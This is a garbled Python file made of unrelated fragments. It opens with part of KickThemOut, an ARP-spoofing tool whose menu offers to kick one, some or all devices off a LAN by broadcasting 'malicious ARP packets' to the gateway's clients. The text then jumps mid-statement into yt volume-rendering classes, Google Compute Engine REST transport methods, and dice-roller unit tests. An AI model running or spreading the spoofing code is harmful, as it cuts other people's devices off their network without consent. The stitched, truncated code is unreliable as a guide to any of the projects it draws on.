import os, sys, logging, math, traceback, optparse, threading
from time import sleep
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
try:
# check whether user is root
if os.geteuid() != 0:
print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END))
os._exit(1)
except:
# then user is probably on windows
pass
def shutdown():
print('\n\n{}Thanks for dropping by.'
'\nCatch ya later!{}'.format(GREEN, END))
os._exit(1)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
try:
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
import scan, spoof, nmap
from urllib.request import urlopen, Request
from urllib.error import URLError
except KeyboardInterrupt:
shutdown()
except:
print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
# display heading
def heading():
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
▀ ▀ ▀ ▀ ▀▀▀
""" + END + BLUE +
'\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}<NAME> ({1}k4m4{2}) & {0}<NAME> ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86))
# loading animation during network scan
def scanningAnimation(text):
try:
global stopAnimation
i = 0
while stopAnimation is not True:
tempText = list(text)
if i >= len(tempText):
i = 0
tempText[i] = tempText[i].upper()
tempText = ''.join(tempText)
sys.stdout.write(GREEN + tempText + '\r' + END)
sys.stdout.flush()
i += 1
time.sleep(0.1)
except:
os._exit(1)
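# (The animation uppercases one character per frame, producing a simple
# marquee effect until stopAnimation is set by the caller.)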
# display options
def optionBanner():
print('\nChoose an option from the menu:\n')
sleep(0.2)
print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE))
# initiate debugging process
def runDebug():
print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END))
print(
"{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format(
RED, END))
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to print defaultGatewayMac...")
try:
print("Reloading MAC retriever function...")
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to reload MAC retriever function / to print defaultGatewayMac...")
try:
print("Known gateway IP: " + defaultGatewayIP)
except:
print("Failed to print defaultGatewayIP...")
try:
print("Crash trace: ")
print(traceback.format_exc())
except:
print("Failed to print crash trace...")
print("DEBUG FINISHED.\nShutting down...")
print("{}".format(END))
os._exit(1)
# make sure there is an internet connection
def checkInternetConnection():
try:
urlopen('https://www.baidu.com', timeout=3)
return True
except URLError as err:
return False
except KeyboardInterrupt:
shutdown()
# retrieve network interface
def getDefaultInterface(returnNet=False):
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
network = scapy.utils.ltoa(bytes_network)
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
iface_routes = [route for route in scapy.config.conf.route.routes if route[3] == scapy.config.conf.iface and route[1] != 0xFFFFFFFF]
network, netmask, _, interface, address = max(iface_routes, key=lambda item:item[1])
net = to_CIDR_notation(network, netmask)
if net:
if returnNet:
return net
else:
return interface
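# Worked example (illustrative values): long2net(0xFFFFFF00) == 24, so a
# network long of 0xC0A80100 with that netmask yields the CIDR '192.168.1.0/24'.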
# retrieve default interface MAC address
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(
RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
else:
return defaultInterfaceMac
except:
# request interface MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve gateway IP
def getGatewayIP():
global stopAnimation
try:
getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway.src
except:
# request gateway IP address (after failed detection by scapy)
stopAnimation = True
print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve host MAC address
def retrieveMACAddress(host):
try:
query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host)
ans, _ = srp(query, timeout=2, verbose=0)
for _, rcv in ans:
return rcv[Ether].src
except:
return False
# resolve mac address of each vendor
def resolveMac(mac):
try:
# send request to macvendors.co
url = "http://macvendors.co/api/vendorname/"
request = Request(url + mac, headers={'User-Agent': "API Browser"})
response = urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except KeyboardInterrupt:
shutdown()
except:
return "N/A"
# regenerate online IPs array & configure gateway
def regenOnlineIPs():
global onlineIPs, defaultGatewayMac, defaultGatewayMacSet
if not defaultGatewayMacSet:
defaultGatewayMac = ""
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
# request gateway MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = input(header)
defaultGatewayMacSet = True
# scan network
def scanNetwork():
global hostsList
try:
# call scanning function from scan.py
hostsList = scan.scanNetwork(getDefaultInterface(True))
except KeyboardInterrupt:
shutdown()
except:
print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
try:
regenOnlineIPs()
except KeyboardInterrupt:
shutdown()
# non-interactive attack
def nonInteractiveAttack():
print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END))
target = options.targets
print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target)))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Checking target status...',))
t.daemon = True
t.start()
try:
nm = nmap.PortScanner()
counter = 0
for host in target:
a = nm.scan(hosts=host, arguments='-sn')
if a['scan'] != {}:
for k, v in a['scan'].items():
if str(v['status']['state']) == 'up':
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
stopAnimation = True
sys.stdout.write("\033[K")
defaultGatewayIP = getGatewayIP()
defaultGatewayMac = retrieveMACAddress(defaultGatewayIP)
except KeyboardInterrupt:
shutdown()
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
for i in target:
ipAddress = i
macAddress = retrieveMACAddress(ipAddress)
if macAddress == False:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp targets on KeyboardInterrupt exception
print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for i in target:
ipAddress = i
try:
macAddress = retrieveMACAddress(ipAddress)
except:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress)
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
# kick one device
def kickoneoff():
os.system("clear||cls")
print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Online IPs: ")
for i in | |
self.sampler(self.volume)
mylog.debug("Done casting rays")
self.finalize_image(camera)
self.current_image = self.apply_colormap()
zbuffer += ZBuffer(self.current_image.astype("float64"), self.sampler.azbuffer)
zbuffer.rgba = ImageArray(zbuffer.rgba)
self.zbuffer = zbuffer
self.current_image = self.zbuffer.rgba
if self._annotate_mesh:
self.current_image = self.annotate_mesh_lines(
self._mesh_line_color, self._mesh_line_alpha
)
return self.current_image
def finalize_image(self, camera):
sam = self.sampler
# reshape data
Nx = camera.resolution[0]
Ny = camera.resolution[1]
self.data = sam.aimage[:, :, 0].reshape(Nx, Ny)
def annotate_mesh_lines(self, color=None, alpha=1.0):
r"""
Modifies this MeshSource by drawing the mesh lines.
This modifies the current image by drawing the element
boundaries and returns the modified image.
Parameters
----------
color: array_like of shape (4,), optional
The RGBA value to use to draw the mesh lines.
Default is black.
alpha : float, optional
The opacity of the mesh lines. Default is 1.0 (opaque).
"""
self._annotate_mesh = True
self._mesh_line_color = color
self._mesh_line_alpha = alpha
if color is None:
color = np.array([0, 0, 0, alpha])
locs = (self.sampler.amesh_lines == 1,)
self.current_image[:, :, 0][locs] = color[0]
self.current_image[:, :, 1][locs] = color[1]
self.current_image[:, :, 2][locs] = color[2]
self.current_image[:, :, 3][locs] = color[3]
return self.current_image
def apply_colormap(self):
"""
Applies a colormap to the current image without re-rendering.
Returns
-------
current_image : A new image with the specified color scale applied to
the underlying data.
"""
image = (
apply_colormap(
self.data, color_bounds=self._color_bounds, cmap_name=self._cmap
)
/ 255.0
)
alpha = image[:, :, 3]
alpha[self.sampler.aimage_used == -1] = 0.0
image[:, :, 3] = alpha
return image
def __repr__(self):
disp = f"<Mesh Source>:{str(self.data_source)} "
return disp
class PointSource(OpaqueSource):
r"""A rendering source of opaque points in the scene.
This class provides a mechanism for adding points to a scene; these
points will be opaque, and can also be colored.
Parameters
----------
positions: array_like of shape (N, 3)
The positions of points to be added to the scene. If specified with no
units, the positions will be assumed to be in code units.
colors : array_like of shape (N, 4), optional
The colors of the points, including an alpha channel, in floating
point running from 0..1.
color_stride : int, optional
The stride with which to access the colors when putting them on the
scene.
radii : array_like of shape (N), optional
The radii of the points in the final image, in pixels (int)
Examples
--------
This example creates a volume rendering and adds 1000 random points to
the image:
>>> import yt
>>> import numpy as np
>>> from yt.visualization.volume_rendering.api import PointSource
>>> from yt.units import kpc
>>> ds = yt.load("IsolatedGalaxy/galaxy0030/galaxy0030")
>>> im, sc = yt.volume_render(ds)
>>> npoints = 1000
>>> vertices = np.random.random([npoints, 3]) * 1000 * kpc
>>> colors = np.random.random([npoints, 4])
>>> colors[:, 3] = 1.0
>>> points = PointSource(vertices, colors=colors)
>>> sc.add_source(points)
>>> im = sc.render()
"""
_image = None
data_source = None
def __init__(self, positions, colors=None, color_stride=1, radii=None):
assert positions.ndim == 2 and positions.shape[1] == 3
if colors is not None:
assert colors.ndim == 2 and colors.shape[1] == 4
assert colors.shape[0] == positions.shape[0]
if not is_sequence(radii):
if radii is not None: # broadcast the value
radii = radii * np.ones(positions.shape[0], dtype="int64")
else: # default radii to 0 pixels (i.e. point is 1 pixel wide)
radii = np.zeros(positions.shape[0], dtype="int64")
else:
assert radii.ndim == 1
assert radii.shape[0] == positions.shape[0]
self.positions = positions
# If colors aren't individually set, default to white with full opacity
if colors is None:
colors = np.ones((len(positions), 4))
self.colors = colors
self.color_stride = color_stride
self.radii = radii
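        # e.g. (illustrative): PointSource(np.zeros((5, 3)), radii=2) broadcasts
        # the scalar to radii == np.array([2, 2, 2, 2, 2], dtype="int64")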
def render(self, camera, zbuffer=None):
"""Renders an image using the provided camera
Parameters
----------
camera: :class:`yt.visualization.volume_rendering.camera.Camera`
A volume rendering camera. Can be any type of camera.
zbuffer: :class:`yt.visualization.volume_rendering.zbuffer_array.Zbuffer`
A zbuffer array. This is used for opaque sources to determine the
z position of the source relative to other sources. Only useful if
you are manually calling render on multiple sources. Scene.render
uses this internally.
Returns
-------
A :class:`yt.data_objects.image_array.ImageArray` containing
the rendered image.
"""
vertices = self.positions
if zbuffer is None:
empty = camera.lens.new_image(camera)
z = np.empty(empty.shape[:2], dtype="float64")
empty[:] = 0.0
z[:] = np.inf
zbuffer = ZBuffer(empty, z)
else:
empty = zbuffer.rgba
z = zbuffer.z
# DRAW SOME POINTS
camera.lens.setup_box_properties(camera)
px, py, dz = camera.lens.project_to_plane(camera, vertices)
zpoints(empty, z, px, py, dz, self.colors, self.radii, self.color_stride)
self.zbuffer = zbuffer
return zbuffer
def __repr__(self):
disp = "<Point Source>"
return disp
class LineSource(OpaqueSource):
r"""A render source for a sequence of opaque line segments.
This class provides a mechanism for adding lines to a scene; these
points will be opaque, and can also be colored.
.. note::
If adding a LineSource to your rendering causes the image to appear
blank or fades a VolumeSource, try lowering the values specified in
the alpha channel of the ``colors`` array.
Parameters
----------
positions: array_like of shape (N, 2, 3)
The positions of the starting and stopping points for each line.
For example, positions[0][0] and positions[0][1] would give the (x, y, z)
coordinates of the beginning and end points of the first line,
respectively. If specified with no units, assumed to be in code units.
colors : array_like of shape (N, 4), optional
The colors of the points, including an alpha channel, in floating
point running from 0..1. The four channels correspond to r, g, b, and
alpha values. Note that they correspond to the line segment succeeding
each point; this means that strictly speaking they need only be (N-1)
in length.
color_stride : int, optional
The stride with which to access the colors when putting them on the
scene.
Examples
--------
This example creates a volume rendering and then adds some random lines
to the image:
>>> import yt
>>> import numpy as np
>>> from yt.visualization.volume_rendering.api import LineSource
>>> from yt.units import kpc
>>> ds = yt.load("IsolatedGalaxy/galaxy0030/galaxy0030")
>>> im, sc = yt.volume_render(ds)
>>> nlines = 4
>>> vertices = np.random.random([nlines, 2, 3]) * 600 * kpc
>>> colors = np.random.random([nlines, 4])
>>> colors[:, 3] = 1.0
>>> lines = LineSource(vertices, colors)
>>> sc.add_source(lines)
>>> im = sc.render()
"""
_image = None
data_source = None
def __init__(self, positions, colors=None, color_stride=1):
super().__init__()
assert positions.ndim == 3
assert positions.shape[1] == 2
assert positions.shape[2] == 3
if colors is not None:
assert colors.ndim == 2
assert colors.shape[1] == 4
# convert the positions to the shape expected by zlines, below
N = positions.shape[0]
self.positions = positions.reshape((2 * N, 3))
# If colors aren't individually set, default to white with full opacity
if colors is None:
colors = np.ones((len(positions), 4))
self.colors = colors
self.color_stride = color_stride
def render(self, camera, zbuffer=None):
"""Renders an image using the provided camera
Parameters
----------
camera: :class:`yt.visualization.volume_rendering.camera.Camera`
A volume rendering camera. Can be any type of camera.
zbuffer: :class:`yt.visualization.volume_rendering.zbuffer_array.Zbuffer`
A zbuffer array. This is used for opaque sources to determine the
z position of the source relative to other sources. Only useful if
you are manually calling render on multiple sources. Scene.render
uses this internally.
Returns
-------
A :class:`yt.data_objects.image_array.ImageArray` containing
the rendered image.
"""
vertices = self.positions
if zbuffer is None:
empty = camera.lens.new_image(camera)
z = np.empty(empty.shape[:2], dtype="float64")
empty[:] = 0.0
z[:] = np.inf
zbuffer = ZBuffer(empty, z)
else:
empty = zbuffer.rgba
z = zbuffer.z
# DRAW SOME LINES
camera.lens.setup_box_properties(camera)
px, py, dz = camera.lens.project_to_plane(camera, vertices)
px = px.astype("int64")
py = py.astype("int64")
if len(px.shape) == 1:
zlines(
empty, z, px, py, dz, self.colors.astype("float64"), self.color_stride
)
else:
# For stereo-lens, two sets of pos for each eye are contained
# in px...pz
zlines(
empty,
z,
px[0, :],
py[0, :],
dz[0, :],
self.colors.astype("float64"),
self.color_stride,
)
zlines(
empty,
z,
px[1, :],
py[1, :],
dz[1, :],
self.colors.astype("float64"),
self.color_stride,
)
self.zbuffer = zbuffer
return zbuffer
def __repr__(self):
disp = "<Line Source>"
return disp
class BoxSource(LineSource):
r"""A render source for a box drawn with line segments.
This render source will draw a box, with transparent faces, in data
space coordinates. This is useful for annotations.
Parameters
----------
left_edge: array-like of shape (3,), float
The left edge coordinates of the box.
right_edge : array-like of shape (3,), float
The right edge coordinates of the box.
color : array-like of shape (4,), float, optional
The colors (including alpha) to use for | |
transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/attachDisk".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {
"forceAttach": request.force_attach,
"requestId": request.request_id,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url, json=body,)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
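    # Illustrative URL assembly (hypothetical values, not from the original):
    # for project="p", zone="z", instance="i", force_attach=True, request_id=""
    # the empty request_id is dropped by the truthiness filter above, giving
    #   https://{host}/compute/v1/projects/p/zones/z/instances/i/attachDisk?forceAttach=True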
def delete(
self,
request: compute.DeleteInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the delete method over HTTP.
Args:
request (~.compute.DeleteInstanceRequest):
The request object.
A request message for
Instances.Delete. See the method
description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
- `Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
- `Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {
"requestId": request.request_id,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.delete(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def delete_access_config(
self,
request: compute.DeleteAccessConfigInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the delete access config method over HTTP.
Args:
request (~.compute.DeleteAccessConfigInstanceRequest):
The request object.
A request message for
Instances.DeleteAccessConfig. See the
method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
- `Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
- `Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {
"networkInterface": request.network_interface,
"requestId": request.request_id,
"accessConfig": request.access_config,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def detach_disk(
self,
request: compute.DetachDiskInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Call the detach disk method over HTTP.
Args:
request (~.compute.DetachDiskInstanceRequest):
The request object.
A request message for
Instances.DetachDisk. See the method
description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Operation:
Represents an Operation resource.
Google Compute Engine has three Operation resources:
- `Global </compute/docs/reference/rest/{$api_version}/globalOperations>`__
- `Regional </compute/docs/reference/rest/{$api_version}/regionOperations>`__
- `Zonal </compute/docs/reference/rest/{$api_version}/zoneOperations>`__
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses.
Operations can be global, regional or zonal.
- For global operations, use the ``globalOperations``
resource.
- For regional operations, use the ``regionOperations``
resource.
- For zonal operations, use the ``zonalOperations``
resource.
For more information, read Global, Regional, and Zonal
Resources. (== resource_for
{$api_version}.globalOperations ==) (== resource_for
{$api_version}.regionOperations ==) (== resource_for
{$api_version}.zoneOperations ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/detachDisk".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {
"requestId": request.request_id,
"deviceName": request.device_name,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.post(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Operation.from_json(response.content)
def get(
self,
request: compute.GetInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Instance:
r"""Call the get method over HTTP.
Args:
request (~.compute.GetInstanceRequest):
The request object.
A request message for Instances.Get.
See the method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.Instance:
Represents an Instance resource.
An instance is a virtual machine that is hosted on
Google Cloud Platform. For more information, read
Virtual Machine Instances. (== resource_for
{$api_version}.instances ==)
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.get(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
response.raise_for_status()
# Return the response
return compute.Instance.from_json(response.content)
def get_guest_attributes(
self,
request: compute.GetGuestAttributesInstanceRequest,
*,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.GuestAttributes:
r"""Call the get guest attributes method over HTTP.
Args:
request (~.compute.GetGuestAttributesInstanceRequest):
The request object.
A request message for
Instances.GetGuestAttributes. See the
method description for details.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.compute.GuestAttributes:
A guest attributes entry.
"""
# TODO(yon-mg): need to handle grpc transcoding and parse url correctly
# current impl assumes basic case of grpc transcoding
url = "https://{host}/compute/v1/projects/{project}/zones/{zone}/instances/{instance}/getGuestAttributes".format(
host=self._host,
project=request.project,
zone=request.zone,
instance=request.instance,
)
# TODO(yon-mg): handle nested fields correctly rather than using only top level fields
# not required for GCE
query_params = {
"variableKey": request.variable_key,
"queryPath": request.query_path,
}
# TODO(yon-mg): further discussion needed whether 'python truthiness' is appropriate here
# discards default values
# TODO(yon-mg): add test for proper url encoded strings
query_params = [
"{k}={v}".format(k=k, v=v) for k, v in query_params.items() if v
]
url += "?{}".format("&".join(query_params)).replace(" ", "+")
# Send the request
response = self._session.get(url)
# Raise requests.exceptions.HTTPError if the status code is >= 400
| |
= o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
a5_xor_r = 0xA5 ^ r
assert a5_xor_r.bin_op == operator.__xor__
left, right = a5_xor_r.sources
assert left == ValueRoller(0xA5)
assert right == r
assert tuple(a5_xor_r.roll().outcomes()) == (0xA5 ^ o,), a5_xor_r
r_xor_a5 = r ^ 0xA5
assert r_xor_a5.bin_op == operator.__xor__
left, right = r_xor_a5.sources
assert left == r
assert right == ValueRoller(0xA5)
assert tuple(r_xor_a5.roll().outcomes()) == (o ^ 0xA5,), r_xor_a5
def test_op_or(self) -> None:
for o_type in _INTEGRAL_OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
a5_or_r = 0xA5 | r
assert a5_or_r.bin_op == operator.__or__
left, right = a5_or_r.sources
assert left == ValueRoller(0xA5)
assert right == r
assert tuple(a5_or_r.roll().outcomes()) == (0xA5 | o,), a5_or_r
r_or_a5 = r | 0xA5
assert r_or_a5.bin_op == operator.__or__
left, right = r_or_a5.sources
assert left == r
assert right == ValueRoller(0xA5)
assert tuple(r_or_a5.roll().outcomes()) == (o | 0xA5,), r_or_a5
def _test_cmp_op_helper(
self,
op_name: str,
) -> None:
import operator
__op__ = getattr(operator, f"__{op_name}__")
for o_type in _OUTCOME_TYPES:
for v in range(-2, 3):
o = o_type(v)
r = R.from_value(o, annotation=f"{o_type}({v})")
r_do_op = getattr(r, op_name)
